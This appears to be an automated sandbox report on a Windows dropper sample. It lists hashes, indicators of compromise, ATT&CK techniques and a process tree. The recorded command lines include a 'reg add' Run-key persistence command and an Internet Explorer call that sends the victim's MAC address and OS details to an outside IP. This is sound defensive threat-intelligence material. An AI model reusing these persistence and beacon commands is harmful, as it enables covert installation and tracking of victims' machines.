95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949

Analysis

max time kernel
150s
max time network
129s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
02/12/2022, 23:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
Size

250KB
MD5

3cec113c886e7c5581b797f3698a33b4
SHA1

6cdba588e6a319285b44c69486bfb1a7ca411969
SHA256

95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949
SHA512

88ee5cf6e5558738e934a041ed239a1a868cd8cd8fcec0cce04a3099fcff4a3dff473b4555300da7096ce88dcc943223b9f1dee839775b8da92be36c0231a351
SSDEEP

6144:hu2urzh9xu/XkauEvJK8xja9zT8nquk6XfotMq3RV:hutrzh9xOXk/LraAtX

Score

8^/10

persistence upx

Malware Config

Signatures

Executes dropped EXE 3 IoCs

pid	Process
2064	t2.exe
4244	bho.exe
3388	test.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0001000000022e0a-133.dat	upx
behavioral2/files/0x0001000000022e0a-134.dat	upx
behavioral2/files/0x0002000000022dfb-140.dat	upx
behavioral2/files/0x0002000000022dfb-142.dat	upx
behavioral2/memory/2064-145-0x0000000000400000-0x0000000000421000-memory.dmp	upx
behavioral2/memory/3388-148-0x0000000000400000-0x0000000000A29000-memory.dmp	upx
behavioral2/memory/2064-152-0x0000000000400000-0x0000000000421000-memory.dmp	upx
behavioral2/memory/3388-153-0x0000000000400000-0x0000000000A29000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\micrososot = "c:\\program files (x86)\\winsoft9\\t2.exe "	reg.exe

Drops file in Program Files directory 23 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\winsoft9\taobao.ico	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\game.ico	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\__tmp_rar_sfx_access_check_240564437	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dil	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dll	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\t2.exe	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\taobao.ico	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\game.ico	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files\Thunder\thunder.exe	test.exe
File opened for modification	C:\Program Files (x86)\winsoft9	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\1.vbs	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\bho.exe	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\test.exe	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\bho.exe	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\t2.exe	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\test.exe	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dil	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\WINDOWS	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\3.vbs	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\3.vbs	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\WINDOWS\time	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dll	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\1.vbs	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\WINDOWS\Downloaded Program Files\movie.ico	test.exe
File created	C:\WINDOWS\Downloaded Program Files\mm.ico	test.exe
File created	C:\Windows\Survival_0.txt	t2.exe
File created	C:\WINDOWS\Downloaded Program Files\taobao.ico	test.exe
File opened for modification	C:\WINDOWS\Downloaded Program Files\taobao.ico	test.exe
File created	C:\WINDOWS\Downloaded Program Files\game.ico	test.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 38 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{060FA7C0-74DC-11ED-A0EE-C243EF799EB6} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376434255"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002f2f7ecc9dd00d45bd2e51f6693fbf4f00000000020000000000106600000001000020000000db223059fa7a4b0b52e0c4ce1ac6c7e6ca35ddbfece07d53af9570f2b65aade3000000000e80000000020000200000002774e6340cc400ce643d74ad4aea00cd986c4c26ca406e7936be3fa06dc1577720000000d0bb68c0cbff039eb380a58d34ced0c8e2ead9f8998663d280a85082ed743bed400000002bfb289b233f0482ffa658996abd7fd00f961a44281b3ec762ffb026e36f789c99ac599c6c0ed14841ffe830a452a8cee2d64c0391428c3f11a76168c989955e	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBarLayout = 110000005c00000000000000340000001f0000006e00000001000000a0060000a00f000005000000220400002600000002000000a1060000a00f000004000000a10000000f02000003000000a10200003b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	test.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70e5f9cae808d901	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\WebBrowser	test.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376434254"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{0619327B-74DC-11ED-A0EE-C243EF799EB6} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Layout = 130000000000000000000000300000001400000016000000010000000007000080010000030000000103000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	test.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\Frist	test.exe

Modifies registry class 12 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\anifile\ScriptEngine	test.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open	test.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\anifile\DefaultIcon\ = "C:\\WINDOWS\\Downloaded Program Files\\game.ico"	test.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open\command\ = "C:\\Program Files\\Thunder\\thunder.exe \"%1\" %*"	test.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\anifile\ScriptEngine\ = "JScript.Encode"	test.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\ScriptEngine	test.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\fonfile	test.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell	test.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open\command	test.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\DefaultIcon\ = "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"	test.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\ScriptEngine\ = "JScript.Encode"	test.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe
2064	t2.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
364	iexplore.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
240	iexplore.exe
364	iexplore.exe
364	iexplore.exe

Suspicious use of SetWindowsHookEx 17 IoCs

pid	Process
2064	t2.exe
2064	t2.exe
2064	t2.exe
364	iexplore.exe
364	iexplore.exe
240	iexplore.exe
240	iexplore.exe
364	iexplore.exe
364	iexplore.exe
876	IEXPLORE.EXE
876	IEXPLORE.EXE
1100	IEXPLORE.EXE
1100	IEXPLORE.EXE
3460	IEXPLORE.EXE
3460	IEXPLORE.EXE
3460	IEXPLORE.EXE
3460	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 4864 wrote to memory of 2064	4864	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	81
PID 4864 wrote to memory of 2064	4864	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	81
PID 4864 wrote to memory of 2064	4864	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	81
PID 4864 wrote to memory of 4244	4864	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	82
PID 4864 wrote to memory of 4244	4864	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	82
PID 4864 wrote to memory of 4244	4864	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	82
PID 4864 wrote to memory of 3388	4864	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	83
PID 4864 wrote to memory of 3388	4864	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	83
PID 4864 wrote to memory of 3388	4864	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	83
PID 4864 wrote to memory of 636	4864	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	84
PID 4864 wrote to memory of 636	4864	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	84
PID 4864 wrote to memory of 636	4864	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	84
PID 3388 wrote to memory of 364	3388	test.exe	87
PID 3388 wrote to memory of 364	3388	test.exe	87
PID 364 wrote to memory of 1100	364	iexplore.exe	89
PID 364 wrote to memory of 1100	364	iexplore.exe	89
PID 364 wrote to memory of 1100	364	iexplore.exe	89
PID 240 wrote to memory of 876	240	iexplore.exe	88
PID 240 wrote to memory of 876	240	iexplore.exe	88
PID 240 wrote to memory of 876	240	iexplore.exe	88
PID 364 wrote to memory of 3460	364	iexplore.exe	92
PID 364 wrote to memory of 3460	364	iexplore.exe	92
PID 364 wrote to memory of 3460	364	iexplore.exe	92
PID 2064 wrote to memory of 1600	2064	t2.exe	93
PID 2064 wrote to memory of 1600	2064	t2.exe	93
PID 2064 wrote to memory of 1600	2064	t2.exe	93

C:\Users\Admin\AppData\Local\Temp\95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
"C:\Users\Admin\AppData\Local\Temp\95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4864
- C:\Program Files (x86)\winsoft9\t2.exe
  "C:\Program Files (x86)\winsoft9\t2.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2064
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "micrososot" /d "c:\program files (x86)\winsoft9\t2.exe " /f
    3⤵
    - Adds Run key to start application
    PID:1600
- C:\Program Files (x86)\winsoft9\bho.exe
  "C:\Program Files (x86)\winsoft9\bho.exe"
  2⤵
  - Executes dropped EXE
  PID:4244
- C:\Program Files (x86)\winsoft9\test.exe
  "C:\Program Files (x86)\winsoft9\test.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3388
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=c2-43-ef-79-9e-b6&os=Microsoft Windows XP&flag=bf6d74fc28f4f7298c0935e8f64ea072&user=test
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:364
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:364 CREDAT:17410 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1100
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:364 CREDAT:82946 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:3460
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\winsoft9\1.vbs"
  2⤵
  PID:636

C:\Program Files (x86)\Internet Explorer\ielowutil.exe
"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
1⤵
PID:4044

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:240
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:240 CREDAT:17410 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:876

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\winsoft9\1.vbs

Filesize
161B

MD5
d0d0d3b167b1e1820fa44aca6d47c909

SHA1
531be3e9881e6750630d451aa03529e39574ffd7

SHA256
49727a292c8f46d692df67986e8b8223b9e2244fc7658c2655a71968d2117f77

SHA512
968858b1efef99e1f65f364b3ee807e13dede7dfd8b804668da0540d0c1ab0d27cf4774bd62fa62a7b283dddb9dcfffeb713a1d1c05bb890df25aeca9ae070bf

Download Submit
C:\Program Files (x86)\winsoft9\bho.exe

Filesize
65KB

MD5
4ba9a7d68cf22eef4354e6695b14109c

SHA1
20b6adf9febd22fa74662bf8dfd5a4f5803eda38

SHA256
9e57af5d4f49661f342fc3e3f77db9b5d04cc861d1c102c44bfb663e9a167fee

SHA512
907c73851032ab3ac07ea33bcba794bfce3c429787e34e5e85724c9011abad6277b235613db6da8ecd47619327b2cff14af89792943f248282f7a5e386aa85ac

Download Submit
C:\Program Files (x86)\winsoft9\bho.exe

Filesize
65KB

MD5
4ba9a7d68cf22eef4354e6695b14109c

SHA1
20b6adf9febd22fa74662bf8dfd5a4f5803eda38

SHA256
9e57af5d4f49661f342fc3e3f77db9b5d04cc861d1c102c44bfb663e9a167fee

SHA512
907c73851032ab3ac07ea33bcba794bfce3c429787e34e5e85724c9011abad6277b235613db6da8ecd47619327b2cff14af89792943f248282f7a5e386aa85ac

Download Submit
C:\Program Files (x86)\winsoft9\game.ico

Filesize
14KB

MD5
b67620aa1f5cb8f80251d09ff9588240

SHA1
d74aaba8f94c29c5357b616c12e35dfcb19ed8b6

SHA256
ad688cfdddcc87c272b7326236451a38a5465a28e004b6d88a00c71d3978cf94

SHA512
c3776167680533f4da82d988c04a0832e40bb15028a5828881da92b8d0072f95fa567b3e320a3dab407c930f80b1dc088ca6567426d8cab94a2ac24622e806a9

Download Submit
C:\Program Files (x86)\winsoft9\t2.exe

Filesize
12.9MB

MD5
49e5951f4588503f978ffd05490a37ec

SHA1
708ad83c54027909e89c9bb64eb506a0bfbf916a

SHA256
426160318c9e0319e3b5c61307ae95440f1ddcc0b6708069d41bb8b6accec247

SHA512
263b78cce4b70c238b1edea1b667614742cd420e1c1fb7d155c4c6f0979e7ed66e4bc79f1dd88dabb30b7bfe466cd890fcc86de92fad1545ea2fb58120bd614e

Download Submit
C:\Program Files (x86)\winsoft9\t2.exe

Filesize
12.9MB

MD5
49e5951f4588503f978ffd05490a37ec

SHA1
708ad83c54027909e89c9bb64eb506a0bfbf916a

SHA256
426160318c9e0319e3b5c61307ae95440f1ddcc0b6708069d41bb8b6accec247

SHA512
263b78cce4b70c238b1edea1b667614742cd420e1c1fb7d155c4c6f0979e7ed66e4bc79f1dd88dabb30b7bfe466cd890fcc86de92fad1545ea2fb58120bd614e

Download Submit
C:\Program Files (x86)\winsoft9\taobao.ico

Filesize
2KB

MD5
c2b91f0dc93589c254a84ecea95aa4f1

SHA1
03a527beb4f64b7175fd84a7a6d712921dabc4a6

SHA256
ac195cd6d4feafd10d4a34d766297bc7766fe00afcddc89305143fa043f35149

SHA512
fb7103e7da7df7b2f91a1f6c03608870bb7e41a3967029ce73248f95f331e0e6178fd266cd03fd373db7782f50cb38de14af1604e60189955add198ef3c17c9a

Download Submit
C:\Program Files (x86)\winsoft9\test.exe

Filesize
13.0MB

MD5
02054374886ce17b40f2bbdfa192bb51

SHA1
4e7b1dc2e7f37392cd9717d40eff89d86a678b27

SHA256
e241e3fd28efbfaa5a59087e1d1291dc26c3b786ebc0fe83caed7f9074909034

SHA512
2a2a1184c19bac51e8109bdbc162864b58040d5f1a469b23262f6f6f52c4f960d45c13c6c240e144a3ddaa0a0f09251e66186eadf93252b8c803aefbb2e1594f

Download Submit
C:\Program Files (x86)\winsoft9\test.exe

Filesize
13.0MB

MD5
02054374886ce17b40f2bbdfa192bb51

SHA1
4e7b1dc2e7f37392cd9717d40eff89d86a678b27

SHA256
e241e3fd28efbfaa5a59087e1d1291dc26c3b786ebc0fe83caed7f9074909034

SHA512
2a2a1184c19bac51e8109bdbc162864b58040d5f1a469b23262f6f6f52c4f960d45c13c6c240e144a3ddaa0a0f09251e66186eadf93252b8c803aefbb2e1594f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{060FA7C0-74DC-11ED-A0EE-C243EF799EB6}.dat

Filesize
5KB

MD5
d06fdda18bca32c7ea93100bcc6f12fe

SHA1
b0c80956d737941c4bbb3f40755936d97832f0f9

SHA256
3f247aa02432117dcef9986dcffe031cc37c94c944cce4ea693387ceb6068bb3

SHA512
3ff1a0b1e3e3a58c19d271cddb168f540fd68849b9802f42b3cc02175e5291c4183c1b46ab8a12e2d3ec37e8264251bb53f89e451b5f67283e67ee13965baf0b

Download Submit
